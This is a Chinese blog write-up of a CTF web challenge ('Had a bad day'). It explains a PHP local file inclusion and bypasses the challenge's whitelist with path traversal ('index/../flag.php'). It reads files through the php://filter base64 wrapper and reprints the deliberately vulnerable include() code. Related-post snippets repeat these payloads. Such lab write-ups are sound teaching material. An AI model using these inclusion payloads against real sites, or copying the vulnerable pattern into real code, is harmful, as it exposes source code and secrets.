[BSidesCF 2020]Had a bad day

最新推荐文章于 2022-09-20 13:27:15 发布
最新推荐文章于 2022-09-20 13:27:15 发布
阅读量256 收藏
点赞数 1
文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/125122021
版权

考察知识点

1.include白名单路径检查

白名单是这样的:

strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")

flag就在flag.php里面那么可以这样绕过

index/../flag.php

2.php伪协议

读取文件用最简单的

php://filter/read=convert.base64-encode/resource=flag.php

解题:

进入页面点击一个功能点

有传参点:

1.SQL注入

2.文件包含

尝试一下不是SQL注入,那多半就是文件包含了

尝试一下读取index.php

报错了,最后发现是要把末尾的.php删除

解密完php的内容是这样的:

<?php
$file = $_GET['category'];

if(isset($file))
{
    if(strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
    include ($file . '.php');
}
else
{
    echo "Sorry, we currently only support woofers and meowers.";
}
}
?>

那就采用我们上面介绍的方法:绕过白名单

解码得到flag

 

清风--
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hada-p3
03-27
hada-p3
hada-p2
03-13
hada-p2
BUUCTF:[BSidesCF 2020]Had a bad day
末初的CSDN博客
03-30 5312
BUUCTF:[BSidesCF 2020]Had a bad day 可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息 的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码 base64解码读取源码 <?php $file = $_GET['category']; ...
六年级英语上册 Unit 7 I had a bad day.第一课时教案 广东版开心.doc
10-13
小学教案
六年级英语上册 Unit 7 I had a bad day.第三课时教案 广东版开心.doc
10-13
小学教案
HADA protocol-开源
04-28
用于实现用于序列比对的分层注释相关比对(HADA)协议的脚本以及相关功能。
BUUCTF之[BSidesCF 2020]Had a bad day --- 文件包含漏洞
weixin_44632787的博客
06-22 996
BUUCTF之[BSidesCF 2020]Had a bad day 题目 点击下面的那两个按钮的时候,发现图片会变化。而且链接上的值也是跟着变化。(看上去像是文件包含的题目) 点击链接的时候只是category=后面的值改变,使用盲猜是文件包含漏洞。所以试试?category=flag.php 好吧,可能是攻击的方式不对。换换其它的: ?category=flag.php # 失败 ?category=flag # 失败 ?category=php://filter/read=co
NO.2-13
nigo134的博客
07-27 213
首先利用PHP伪协议读取index.php源代码 payload如下: php://filter/read=convert.base64-encode/resource=index 结果如图所示 源代码如下 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" )
bugku ctf strpos数组绕过
qq_42777804的博客
08-10 2576
<?php $flag = "flag"; if (isset ($_GET['ctf'])) { if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE) echo '必须输入数字才行'; else if (strpos ($_GET['ctf'], '#biubiubiu') !== FALSE) die('Flag: '.$flag); else...
php函数漏洞总结
qq_37410729的博客
07-31 1342
php一些漏洞函数
buuctf(探险3)
qq_62046696的博客
08-13 927
if(!strstr($get_flag," ")){ get传参进入的,里面没有空格、str_ireplace(子字符串忽略大小写替换)第二行,就是把get_flag中的cat 换成wctf20220,说白了就是过滤cat那我们先用ls查一下目录可是并没有什么回显,不知道我是哪错了看了大佬解释,说是传入的2e4不需要空格,这些都会自动加上出来了,但是我们查找目录 cat flag中间一定会有空格,的这里肯定是需要一种别的手段绕过一下。...
BUUCTF Web [BSidesCF 2020]Had a bad day1
网安小趴菜
09-20 879
BUUCTF Web [BSidesCF 2020]Had a bad day1
Fern couldn't eat until her pig had had a drink of milk.中的两个had是什么意思
最新发布
04-21
这个句子中的两个“had”都是动词“have”的过去分词形式,第一个是“had had”,表示发生在过去的过去,意为“已经喝过”,第二个是“had”,表示过去完成时,意为“已经有了”。整个句子的意思是:“在猪喝了一口...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值